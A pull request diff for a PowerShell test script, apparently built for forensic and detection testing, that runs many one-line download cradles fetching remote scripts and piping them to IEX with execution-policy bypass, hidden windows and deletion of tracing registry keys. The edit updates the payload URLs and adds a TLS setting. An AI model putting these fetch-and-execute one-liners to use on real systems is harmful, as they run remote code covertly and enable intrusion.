### PR TITLE
Update Invoke-DownloadCradle.ps1

### DIFF
--- a/static/other/DownloadCradle/Invoke-DownloadCradle.ps1
+++ b/static/other/DownloadCradle/Invoke-DownloadCradle.ps1
@@ -1,4 +1,4 @@
-<#
+ <#
 .SYNOPSIS
 	Invoke-DownloadCradle.ps1 runs several single liner Download cradles.
 
@@ -26,6 +26,11 @@
 # Change this setting for http and https testing.
 $TLS = 1
 
+# Set version of TLS to use
+$TLSV = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12"
+
+
+
 # Null for no sleep between cradles. 10seconds otherwise
 $Sleep=$True
 
@@ -44,12 +49,12 @@ If ($TLS -eq 0){
 ElseIf ($TLS -eq 1){
     # Add https server details here... remember: it is not advised to run other peoples things form the internet!
     $Url = @(
-        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/other/DownloadCradle/payloads/test.ps1", # Basic Powershell Test script
+        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/static/other/DownloadCradle/payloads/test.ps1", # Basic Powershell Test script
         "test.dfir.com.au", # DNS text test - Powershell Test script base64 encoded in DNS txt field
-        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/other/DownloadCradle/payloads/test.xml", # Powershell embedded command
-        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/other/DownloadCradle/payloads/test.sct", # Powershell embedded scriptlet
-        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/other/DownloadCradle/payloads/mshta.sct", # Powershell embedded scriptlet
-        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/other/DownloadCradle/payloads/test.xsl" # Powershell embedded extensible Stylesheet Language
+        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/static/other/DownloadCradle/payloads/test.xml", # Powershell embedded command
+        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/static/other/DownloadCradle/payloads/test.sct", # Powershell embedded scriptlet
+        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/static/other/DownloadCradle/payloads/mshta.sct", # Powershell embedded scriptlet
+        "https://raw.githubusercontent.com/mgreen27/mgreen27.github.io/master/static/other/DownloadCradle/payloads/test.xsl" # Powershell embedded extensible Stylesheet Language
     )
 }
 
@@ -65,6 +70,7 @@ function Invoke-DownloadCradle
         [Parameter(Mandatory = $True)][String]$Type,
         [Parameter(Mandatory = $True)][String]$Command
         )
+
     
     # Clear cache and other relevant files
     Remove-Item -path HKLM:\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 -Recurse -Force -ErrorAction SilentlyContinue
@@ -77,12 +83,13 @@ function Invoke-DownloadCradle
     if (Test-path $Outfile){Remove-Item $Outfile -Force}
     
     If ($Type -eq "Powershell"){
-        Try{powershell -exec bypass -windowstyle hidden -noprofile $Command}
+        $command1 = -Join ($TLSV,";"," ", $command)
+        Try{powershell -exec bypass -windowstyle hidden -noprofile $command1}
         Catch{$_}
     }
     ElseIf ($Type -eq "Regsvr32"){
         Try{
-            powershell -exec bypass -windowstyle hidden -noprofile $Command
+            powershell -exec bypass -windowstyle hidden -noprofile  $Command
             $(Get-Date -Format s) + " Success - see popup window!`n"
         }
         Catch{$_}
@@ -131,16 +138,19 @@ Invoke-DownloadCradle -Type Powershell -Command $Command
 
 
 "Powershell WebClient DownloadData"
-$Command = "[System.Text.Encoding]::ASCII.GetString((New-Object Net.WebClient).DownloadData(`'" + $Url[0] + "`')) | IEX"
+$Command = "WebClient DownloadString"
+$Command = " [System.Text.Encoding]::ASCII.GetString((New-Object Net.WebClient).DownloadData(`'" + $Url[0] + "`')) | IEX"
 Invoke-DownloadCradle -Type Powershell -Command $Command
 
 
 "Powershell WebClient OpenRead"
+$Command = "WebClient DownloadString"
 $Command = "`$sr=New-Object System.IO.StreamReader((New-Object Net.WebClient).OpenRead(`'" + $Url[0] + "`'));`$res=`$sr.ReadToEnd();`$sr.Close();`$res | IEX"
 Invoke-DownloadCradle -Type Powershell -Command $Command
 
 
 "Powershell WebClient DownloadFile"
+$Command = "WebClient DownloadString"
 $Command = "(New-Object Net.WebClient).DownloadFile(`'" + $Url[0] + "`'," + "`'" + $Outfile + "`'); GC `'" + $OutFile + "`' | IEX" 
 Invoke-DownloadCradle -Type Powershell -Command $Command
 
@@ -155,7 +165,8 @@ Else{"`tMethod supported on Powershell 3.0 and above only`n"}
 
 "Powershell Invoke-RestMethod"
 If ($PSVersionTable.PSVersion.Major -gt 2){
-    $Command = "(`'" + $Url[0] + "`'|ForEach{(IRM (Variable _).Value)}) | IEX"
+    $Command = "WebClient DownloadString"
+$Command = "(`'" + $Url[0] + "`'|ForEach{(IRM (Variable _).Value)}) | IEX"
     Invoke-DownloadCradle -Type Powershell -Command $Command
 }
 Else{"`tMethod supported on Powershell 3.0 and above only`n"}
@@ -199,7 +210,7 @@ Invoke-DownloadCradle -Type Powershell -Command $Command
 
 
 "Powershell Inline C#"
-$Command="Add-Type 'using System.Net;public class Class{public static string Method(string url){return (new WebClient()).DownloadString(url);}}';IEX ([Class]::Method(`'" + $Url[0] + "`'))"
+$Command=" Add-Type 'using System.Net;public class Class{public static string Method(string url){return (new WebClient()).DownloadString(url);}}';IEX ([Class]::Method(`'" + $Url[0] + "`'))"
 Invoke-DownloadCradle -Type Powershell -Command $Command
 
 
@@ -291,4 +302,4 @@ $webclient.DownloadString($Url) | Out-Null;"Fake .NET User-Agent completed"
 # Execution
 powershell -exec bypass -windowstyle hidden -noprofile $Command
 cmd /c
-#>
+#> 


### PR DESCRIPTION
General changes:
- updated https URL's to have current URI to eliminate 404 errors


Command changes
- added a variable on line 30 to hold enabled TLS Version setting
- - Added code on line 86 to take the TLS setting in variable $TLSV and join it with the command variable so that every execution inherits the TLS setting since each download test is a new process and doesn't take inherited settings, allowing tests to successfully complete